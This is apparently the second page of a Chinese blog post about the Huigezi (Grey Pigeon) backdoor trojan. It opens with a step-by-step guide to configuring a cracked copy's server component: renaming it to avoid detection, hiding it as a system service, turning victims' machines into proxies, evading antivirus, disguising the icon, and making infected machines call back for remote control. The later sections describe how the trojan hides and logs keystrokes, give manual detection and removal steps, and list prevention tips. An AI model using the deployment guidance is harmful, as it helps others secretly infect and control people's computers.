4)“用户名称”“用户密码”这两个地方乱填些数字进去就行了,破解版用不了正式版的服务器的,它是服务器用来验证软件是否“正版”用的。


“安装选项”选项卡,建议修改一下名字,以免被发现,其它的自己看着办,看着喜欢就选吧~~~^_^
“启动项”这个很重要,建议你修改一下名字,它主要是服务端随系统自动启动用的,也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用的,这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除灰鸽子的原因,因为它写成了服务,这个的优先级是系统级的,所有使用这台电脑的用户都会启动木马。
“代理服务”,嘻嘻,就是你控制的电脑可以给我们做为一台代理服务器,说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~
“高级选项”这里主要是用来对付杀毒软件和防火墙用的,默认是插入IEXPLORER,启动隐藏文件隐藏插入的IE进程,以及使用UPX压缩,这里就不用去改它的,默认就行。
"服务器图标”是用来伪装用的,你自己选项自己喜欢的图标吧~~~

配置好了就点击生成服务器,软件会优先从官方验证,但没效,出错了后就从本地服务器验证,这就是我们要本机建http服务器的原因。好了,到此,服务端就生成了,不要运行它,运行了你就会中木马的,(不准做坏事)

软件使用方法:当别人中了你的木马后,它会从你的网站读取ip.txt这个文件,然后主动连接到你的电脑,如果你此时也打开了客户端的话,连接建立成功,你可以控制这台电脑了。具体有什么内容你自己摸索,如果你是动态IP地址的话,那么你要每次把新的ip.txt上传到网站上去~~~


灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。 服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。

下面介绍服务端:

配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改洌 H缓蠛诳屠 靡磺邪旆ㄓ掌 没г诵蠫_Server.exe程序。具体采用什么办法,读者可以充分发挥想象力,这里就不赘述。G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录),然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端,G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉种了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。

灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数被截获,正常模式下难以遍历到灰鸽子的文件和模块,造成查杀上的困难。要卸载灰鸽子动态库而且保证系统进程不崩溃也很麻烦,因此造成了近期灰鸽子在互联网上泛滥的局面。


一.灰鸽子的手工检测
由于灰鸽子拦截了API调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。

但是,通过仔细观察我们发现,对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工检测出灰鸽子 服务端。

由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。

1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中
选择“显示所有文件和文件夹”,然后点击“确定”。
2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。
3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll的文件。
4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。

经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了,下面就可以进行手动清除。

二、灰鸽子的手工清除

经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。

注意:为防止误操作,清除前一定要做好备份。

(一)、清除灰鸽子的服务

注意清除灰鸽子的服务一定要在注册表里完成,对注册表不熟悉的网友请找熟悉的人帮忙操作,清除灰鸽子的服务一定要先备份注册表,或者到纯DOS下将注册表文件更名,然后在去注册表删除灰鸽子的服务。因为病毒会和EXE文件进行关联

2000/XP系统:
1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。),打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。
2、点击菜单“编辑”-》“查找”,“查找目标”输入“game.exe”,点击确定,我们就可以找到灰鸽子的服务项(此例为Game_Server,每个人这个服务项名称是不同的)。
3、删除整个Game_Server项。 98/me系统: 在9X下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项,我们立即看到名为Game.exe的一项,将Game.exe项删除即可。

(二)、删除灰鸽子程序文件

删除灰鸽子程序文件非常简单,只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件,然后重新启动计算机。至此,灰鸽子VIP 2005 服务端已经被清除干净。

以上介绍的方法适用于我们看到的大部分灰鸽子木马及其变种,然而仍有极少数变种采用此种方法无法检测和清除。同时,随着灰鸽子新版本的不断推出,作者可能会加入一些新的隐藏方法、防删除手段,手工检测和清除它的难度也会越来越大。

三、防止中灰鸽子病毒需要注意的事项

1. 给系统安装补丁程序。通过Windows Update安装好系统补丁程序(关键更新、安全更新和Service pack),其中MS04-011、MS04-012、MS04-013、MS03-001、MS03-007、MS03-049、MS04-032等都被病毒广泛利用,是非常必要的补丁程序
2. 给系统管理员帐户设置足够复杂足够强壮的密码,最好能是10位以上,字母+数字+其它符号的组合;也可以禁用/删除一些不使用的帐户
3. 经常更新杀毒软件(病毒库),设置允许的可设置为每天定时自动更新。安装并合理使用网络防火墙软件,网络防火墙在防病毒过程中也可以起到至关重要的作用,能有效地阻挡自来网络的攻击和病毒的入侵。部分盗版Windows用户不能正常安装补丁,这点也比较无奈,这部分用户不妨通过使用网络防火墙来进行一定防护
4. 关闭一些不需要的服务,条件允许的可关闭没有必要的共享,也包括C$、D$等管理共享。完全单机的用户可直接关闭Server服务。这些都可以用winxp总管等优化软件关闭。
WinXP 总管 v4.9.3 中文注册版
http://www.366tian.net/soft/data/soft/219.html
5. 不要随便打开或运行陌生、可疑文件和程序,如邮件中的奇怪附件,WG程序等。


软件名称: 灰鸽子(Huigezi、Gpigeon)专用检测清除工具
官方提供的清除工具
下载地址:
http://www.huigezi.net/opensoft.asp?soft_id=112&url=1
Tags:
分页: 2/2 第一页 上页 1 2 最后页 [ 显示模式: 摘要 | 列表 ]